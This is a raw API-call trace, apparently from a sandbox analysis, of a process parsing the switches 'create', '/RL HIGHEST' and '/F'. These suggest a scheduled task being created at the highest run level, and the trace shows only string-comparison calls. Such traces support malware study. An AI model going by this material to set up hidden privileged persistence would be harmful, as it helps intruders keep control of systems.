lstrlenW (lpString="RL") returned 2 [0172.556] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.556] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.556] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.556] lstrlenW (lpString="|create|") returned 8 [0172.556] lstrlenW (lpString="|RL|") returned 4 [0172.557] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0172.557] SetLastError (dwErrCode=0x490) [0172.557] lstrlenW (lpString="?") returned 1 [0172.557] lstrlenW (lpString="?") returned 1 [0172.557] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.557] lstrlenW (lpString="RL") returned 2 [0172.557] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.557] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.557] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.557] lstrlenW (lpString="|?|") returned 3 [0172.557] lstrlenW (lpString="|RL|") returned 4 [0172.557] SetLastError (dwErrCode=0x490) [0172.557] lstrlenW (lpString="s") returned 1 [0172.557] lstrlenW (lpString="s") returned 1 [0172.557] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.557] lstrlenW (lpString="RL") returned 2 [0172.557] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.557] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.557] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.557] lstrlenW (lpString="|s|") returned 3 [0172.557] lstrlenW (lpString="|RL|") returned 4 [0172.557] SetLastError (dwErrCode=0x490) [0172.557] lstrlenW (lpString="u") returned 1 [0172.557] lstrlenW (lpString="u") returned 1 [0172.557] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.558] lstrlenW (lpString="RL") returned 2 [0172.558] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.558] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.558] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.558] lstrlenW (lpString="|u|") returned 3 [0172.558] lstrlenW (lpString="|RL|") returned 4 [0172.558] SetLastError (dwErrCode=0x490) [0172.558] lstrlenW (lpString="p") returned 1 [0172.558] lstrlenW (lpString="p") returned 1 [0172.558] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.558] lstrlenW (lpString="RL") returned 2 [0172.558] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.558] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.558] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.559] lstrlenW (lpString="|p|") returned 3 [0172.559] lstrlenW (lpString="|RL|") returned 4 [0172.559] SetLastError (dwErrCode=0x490) [0172.559] lstrlenW (lpString="ru") returned 2 [0172.559] lstrlenW (lpString="ru") returned 2 [0172.559] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.559] lstrlenW (lpString="RL") returned 2 [0172.559] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.559] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.559] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.559] lstrlenW (lpString="|ru|") returned 4 [0172.559] lstrlenW (lpString="|RL|") returned 4 [0172.559] StrStrIW (lpFirst="|ru|", lpSrch="|RL|") returned 0x0 [0172.559] SetLastError (dwErrCode=0x490) [0172.559] lstrlenW (lpString="rp") returned 2 [0172.559] lstrlenW (lpString="rp") returned 2 [0172.560] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.560] lstrlenW (lpString="RL") returned 2 [0172.560] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.560] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.560] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.560] lstrlenW (lpString="|rp|") returned 4 [0172.560] lstrlenW (lpString="|RL|") returned 4 [0172.560] StrStrIW (lpFirst="|rp|", lpSrch="|RL|") returned 0x0 [0172.560] SetLastError (dwErrCode=0x490) [0172.560] lstrlenW (lpString="sc") returned 2 [0172.560] lstrlenW (lpString="sc") returned 2 [0172.560] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.560] lstrlenW (lpString="RL") returned 2 [0172.560] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.560] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.560] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.561] lstrlenW (lpString="|sc|") returned 4 [0172.561] lstrlenW (lpString="|RL|") returned 4 [0172.561] StrStrIW (lpFirst="|sc|", lpSrch="|RL|") returned 0x0 [0172.561] SetLastError (dwErrCode=0x490) [0172.561] lstrlenW (lpString="mo") returned 2 [0172.561] lstrlenW (lpString="mo") returned 2 [0172.561] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.561] lstrlenW (lpString="RL") returned 2 [0172.561] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.561] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.561] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.561] lstrlenW (lpString="|mo|") returned 4 [0172.561] lstrlenW (lpString="|RL|") returned 4 [0172.561] StrStrIW (lpFirst="|mo|", lpSrch="|RL|") returned 0x0 [0172.561] SetLastError (dwErrCode=0x490) [0172.561] lstrlenW (lpString="d") returned 1 [0172.561] lstrlenW (lpString="d") returned 1 [0172.561] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.562] lstrlenW (lpString="RL") returned 2 [0172.562] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.562] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|d|") returned 3 [0172.562] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.562] lstrlenW (lpString="|d|") returned 3 [0172.562] lstrlenW (lpString="|RL|") returned 4 [0172.562] SetLastError (dwErrCode=0x490) [0172.562] lstrlenW (lpString="m") returned 1 [0172.562] lstrlenW (lpString="m") returned 1 [0172.562] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.563] lstrlenW (lpString="RL") returned 2 [0172.563] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.563] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|m|") returned 3 [0172.563] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.563] lstrlenW (lpString="|m|") returned 3 [0172.563] lstrlenW (lpString="|RL|") returned 4 [0172.563] SetLastError (dwErrCode=0x490) [0172.563] lstrlenW (lpString="i") returned 1 [0172.563] lstrlenW (lpString="i") returned 1 [0172.563] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.563] lstrlenW (lpString="RL") returned 2 [0172.563] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.563] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|i|") returned 3 [0172.563] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.563] lstrlenW (lpString="|i|") returned 3 [0172.563] lstrlenW (lpString="|RL|") returned 4 [0172.564] SetLastError (dwErrCode=0x490) [0172.564] lstrlenW (lpString="tn") returned 2 [0172.564] lstrlenW (lpString="tn") returned 2 [0172.564] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.564] lstrlenW (lpString="RL") returned 2 [0172.564] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.564] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.564] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.564] lstrlenW (lpString="|tn|") returned 4 [0172.564] lstrlenW (lpString="|RL|") returned 4 [0172.564] StrStrIW (lpFirst="|tn|", lpSrch="|RL|") returned 0x0 [0172.564] SetLastError (dwErrCode=0x490) [0172.564] lstrlenW (lpString="tr") returned 2 [0172.564] lstrlenW (lpString="tr") returned 2 [0172.564] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.564] lstrlenW (lpString="RL") returned 2 [0172.564] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.564] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.564] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.564] lstrlenW (lpString="|tr|") returned 4 [0172.565] lstrlenW (lpString="|RL|") returned 4 [0172.565] StrStrIW (lpFirst="|tr|", lpSrch="|RL|") returned 0x0 [0172.565] SetLastError (dwErrCode=0x490) [0172.565] lstrlenW (lpString="st") returned 2 [0172.565] lstrlenW (lpString="st") returned 2 [0172.565] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.565] lstrlenW (lpString="RL") returned 2 [0172.565] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.565] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|st|") returned 4 [0172.565] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.565] lstrlenW (lpString="|st|") returned 4 [0172.565] lstrlenW (lpString="|RL|") returned 4 [0172.565] StrStrIW (lpFirst="|st|", lpSrch="|RL|") returned 0x0 [0172.565] SetLastError (dwErrCode=0x490) [0172.565] lstrlenW (lpString="sd") returned 2 [0172.565] lstrlenW (lpString="sd") returned 2 [0172.566] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.566] lstrlenW (lpString="RL") returned 2 [0172.566] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.566] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sd|") returned 4 [0172.566] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.566] lstrlenW (lpString="|sd|") returned 4 [0172.566] lstrlenW (lpString="|RL|") returned 4 [0172.566] StrStrIW (lpFirst="|sd|", lpSrch="|RL|") returned 0x0 [0172.566] SetLastError (dwErrCode=0x490) [0172.566] lstrlenW (lpString="ed") returned 2 [0172.566] lstrlenW (lpString="ed") returned 2 [0172.566] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.566] lstrlenW (lpString="RL") returned 2 [0172.566] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.567] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ed|") returned 4 [0172.567] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.567] lstrlenW (lpString="|ed|") returned 4 [0172.567] lstrlenW (lpString="|RL|") returned 4 [0172.567] StrStrIW (lpFirst="|ed|", lpSrch="|RL|") returned 0x0 [0172.567] SetLastError (dwErrCode=0x490) [0172.567] lstrlenW (lpString="it") returned 2 [0172.567] lstrlenW (lpString="it") returned 2 [0172.567] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.567] lstrlenW (lpString="RL") returned 2 [0172.567] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.567] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|it|") returned 4 [0172.567] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.567] lstrlenW (lpString="|it|") returned 4 [0172.567] lstrlenW (lpString="|RL|") returned 4 [0172.567] StrStrIW (lpFirst="|it|", lpSrch="|RL|") returned 0x0 [0172.567] SetLastError (dwErrCode=0x490) [0172.567] lstrlenW (lpString="et") returned 2 [0172.567] lstrlenW (lpString="et") returned 2 [0172.567] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.568] lstrlenW (lpString="RL") returned 2 [0172.568] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.568] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|et|") returned 4 [0172.568] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.568] lstrlenW (lpString="|et|") returned 4 [0172.568] lstrlenW (lpString="|RL|") returned 4 [0172.568] StrStrIW (lpFirst="|et|", lpSrch="|RL|") returned 0x0 [0172.568] SetLastError (dwErrCode=0x490) [0172.568] lstrlenW (lpString="k") returned 1 [0172.568] lstrlenW (lpString="k") returned 1 [0172.568] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.568] lstrlenW (lpString="RL") returned 2 [0172.569] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.569] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|k|") returned 3 [0172.569] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.569] lstrlenW (lpString="|k|") returned 3 [0172.569] lstrlenW (lpString="|RL|") returned 4 [0172.569] SetLastError (dwErrCode=0x490) [0172.569] lstrlenW (lpString="du") returned 2 [0172.569] lstrlenW (lpString="du") returned 2 [0172.569] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.569] lstrlenW (lpString="RL") returned 2 [0172.569] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.569] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|du|") returned 4 [0172.569] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.570] lstrlenW (lpString="|du|") returned 4 [0172.570] lstrlenW (lpString="|RL|") returned 4 [0172.570] StrStrIW (lpFirst="|du|", lpSrch="|RL|") returned 0x0 [0172.570] SetLastError (dwErrCode=0x490) [0172.570] lstrlenW (lpString="ri") returned 2 [0172.570] lstrlenW (lpString="ri") returned 2 [0172.570] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.570] lstrlenW (lpString="RL") returned 2 [0172.570] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.570] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ri|") returned 4 [0172.570] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.570] lstrlenW (lpString="|ri|") returned 4 [0172.570] lstrlenW (lpString="|RL|") returned 4 [0172.570] StrStrIW (lpFirst="|ri|", lpSrch="|RL|") returned 0x0 [0172.570] SetLastError (dwErrCode=0x490) [0172.570] lstrlenW (lpString="z") returned 1 [0172.570] lstrlenW (lpString="z") returned 1 [0172.570] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.571] lstrlenW (lpString="RL") returned 2 [0172.571] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.571] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|z|") returned 3 [0172.571] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.571] lstrlenW (lpString="|z|") returned 3 [0172.571] lstrlenW (lpString="|RL|") returned 4 [0172.571] SetLastError (dwErrCode=0x490) [0172.571] lstrlenW (lpString="f") returned 1 [0172.571] lstrlenW (lpString="f") returned 1 [0172.571] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.571] lstrlenW (lpString="RL") returned 2 [0172.571] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.572] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|f|") returned 3 [0172.572] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.572] lstrlenW (lpString="|f|") returned 3 [0172.572] lstrlenW (lpString="|RL|") returned 4 [0172.572] SetLastError (dwErrCode=0x490) [0172.572] lstrlenW (lpString="v1") returned 2 [0172.572] lstrlenW (lpString="v1") returned 2 [0172.572] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.572] lstrlenW (lpString="RL") returned 2 [0172.572] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.572] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|v1|") returned 4 [0172.572] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.572] lstrlenW (lpString="|v1|") returned 4 [0172.572] lstrlenW (lpString="|RL|") returned 4 [0172.573] StrStrIW (lpFirst="|v1|", lpSrch="|RL|") returned 0x0 [0172.573] SetLastError (dwErrCode=0x490) [0172.573] lstrlenW (lpString="xml") returned 3 [0172.573] lstrlenW (lpString="xml") returned 3 [0172.573] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.573] lstrlenW (lpString="RL") returned 2 [0172.573] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.573] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|xml|") returned 5 [0172.573] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.573] lstrlenW (lpString="|xml|") returned 5 [0172.573] lstrlenW (lpString="|RL|") returned 4 [0172.573] StrStrIW (lpFirst="|xml|", lpSrch="|RL|") returned 0x0 [0172.573] SetLastError (dwErrCode=0x490) [0172.573] lstrlenW (lpString="ec") returned 2 [0172.573] lstrlenW (lpString="ec") returned 2 [0172.573] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.574] lstrlenW (lpString="RL") returned 2 [0172.574] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.574] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ec|") returned 4 [0172.574] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.574] lstrlenW (lpString="|ec|") returned 4 [0172.574] lstrlenW (lpString="|RL|") returned 4 [0172.574] StrStrIW (lpFirst="|ec|", lpSrch="|RL|") returned 0x0 [0172.574] SetLastError (dwErrCode=0x490) [0172.574] lstrlenW (lpString="rl") returned 2 [0172.574] lstrlenW (lpString="rl") returned 2 [0172.574] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.574] lstrlenW (lpString="RL") returned 2 [0172.574] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.574] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rl|") returned 4 [0172.574] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|RL|") returned 4 [0172.574] lstrlenW (lpString="|rl|") returned 4 [0172.574] lstrlenW (lpString="|RL|") returned 4 [0172.574] StrStrIW (lpFirst="|rl|", lpSrch="|RL|") returned="|rl|" [0172.574] SetLastError (dwErrCode=0x0) [0172.575] SetLastError (dwErrCode=0x0) [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] lstrlenW (lpString="-/") returned 2 [0172.575] StrChrIW (lpStart="-/", wMatch=0x48) returned 0x0 [0172.575] SetLastError (dwErrCode=0x490) [0172.575] SetLastError (dwErrCode=0x490) [0172.575] SetLastError (dwErrCode=0x0) [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0172.575] SetLastError (dwErrCode=0x490) [0172.575] SetLastError (dwErrCode=0x0) [0172.575] _memicmp (_Buf1=0x9d4e70, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] lstrlenW (lpString=" \x09") returned 2 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0172.575] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0172.575] GetLastError () returned 0x0 [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] lstrlenW (lpString="HIGHEST") returned 7 [0172.575] SetLastError (dwErrCode=0x0) [0172.575] SetLastError (dwErrCode=0x0) [0172.576] lstrlenW (lpString="/F") returned 2 [0172.576] lstrlenW (lpString="-/") returned 2 [0172.576] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.576] lstrlenW (lpString="create") returned 6 [0172.576] lstrlenW (lpString="create") returned 6 [0172.576] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.576] lstrlenW (lpString="F") returned 1 [0172.576] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.576] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.576] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.576] lstrlenW (lpString="|create|") returned 8 [0172.576] lstrlenW (lpString="|F|") returned 3 [0172.576] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0172.576] SetLastError (dwErrCode=0x490) [0172.576] lstrlenW (lpString="?") returned 1 [0172.576] lstrlenW (lpString="?") returned 1 [0172.576] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.576] lstrlenW (lpString="F") returned 1 [0172.577] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.577] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.577] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.577] lstrlenW (lpString="|?|") returned 3 [0172.577] lstrlenW (lpString="|F|") returned 3 [0172.577] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0172.577] SetLastError (dwErrCode=0x490) [0172.577] lstrlenW (lpString="s") returned 1 [0172.577] lstrlenW (lpString="s") returned 1 [0172.577] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.577] lstrlenW (lpString="F") returned 1 [0172.577] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.577] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.577] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.577] lstrlenW (lpString="|s|") returned 3 [0172.577] lstrlenW (lpString="|F|") returned 3 [0172.577] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0172.577] SetLastError (dwErrCode=0x490) [0172.577] lstrlenW (lpString="u") returned 1 [0172.577] lstrlenW (lpString="u") returned 1 [0172.577] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.577] lstrlenW (lpString="F") returned 1 